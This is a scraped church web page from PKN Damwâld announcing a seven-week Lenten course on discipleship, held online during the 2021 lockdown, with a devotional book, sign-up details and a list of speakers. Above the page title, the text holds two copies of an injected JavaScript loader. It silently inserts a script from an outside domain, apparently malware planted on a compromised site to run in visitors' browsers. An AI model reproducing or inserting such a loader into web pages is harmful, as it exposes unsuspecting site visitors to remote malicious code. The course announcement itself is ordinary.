;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Cursus discipelen van Jezus - PKN Damwâld

Cursus discipelen van Jezus

Gepubliceerd op: maandag 1 februari 2021

Het valt niet mee in deze tijd. Door de strenge lockdown zijn veel kerken dicht, moet je meer thuis blijven en thuis werken. Kerkelijk werk ligt veelal stil en hoe ziet geloven en volgen van de Here Jezus er in deze tijd uit?
De antwoorden op dergelijke vragen komen je niet aanwaaien. Petrus en Johannes waren hun leven lang navolgers en leerlingen van Jezus. Enkele voorgangers van verschillende gemeenten uit het Noord Oost Friesland nodigen jou uit je gedurende zeven weken te verdiepen in het thema: wat betekent het om leerling van Jezus te zijn. Ze maken daarbij gebruik van een cursus. De inhoud van die cursus komt tot je in een dagboek. Aan de hand van dat dagboek ga je dag voor dag, stap voor stap op weg naar Pasen. Naast een sleutelvers is er elke dag een stukje onderwijs, een uitdaging, een gebed en een toepassing in dit boek, zodat je leert leven in de kracht van Jezus. Daarnaast is er elke week een cursusavond op de donderdag, die verzorgd wordt door verschillende voorgangers en die je digitaal kunt volgen. We beginnen op 18 februari. De laatste avond zal op een woensdag zijn: 31 maart.
Het dagboek is heel geschikt voor persoonlijk gebruik, maar ook voor kleine groepen. We proberen om via zoom, skype o.i.d. kleine groepen te vormen voor wie zich aanmeldt. Maar hopelijk worden de corona-regels over enkele weken weer wat opgerekt, zodat er meer kan om in groepsverband bij elkaar te komen.
We nodigen je van harte uit mee te doen. Je kunt je opgeven voor 13 februari bij ds. Otter, g.j.otter@planet.nl. Het dagboek “Discipelen van Jezus” kost acht euro.
De cursus die al eerder die in onze gemeenten in Damwâld werd aangekondigd kan momenteel vanwege de maatregelen niet plaatsvinden. We kunnen namelijk nog niet in kleine groepen bij elkaar komen.
Bij de avond zullen verschillende leiding geven aan een avond, o.a : Leo Blees, ds. Timmer, ds. Van Marrum, Pieter Knijff, Wiebe Feddema en ds. Otter en misschien nog meer.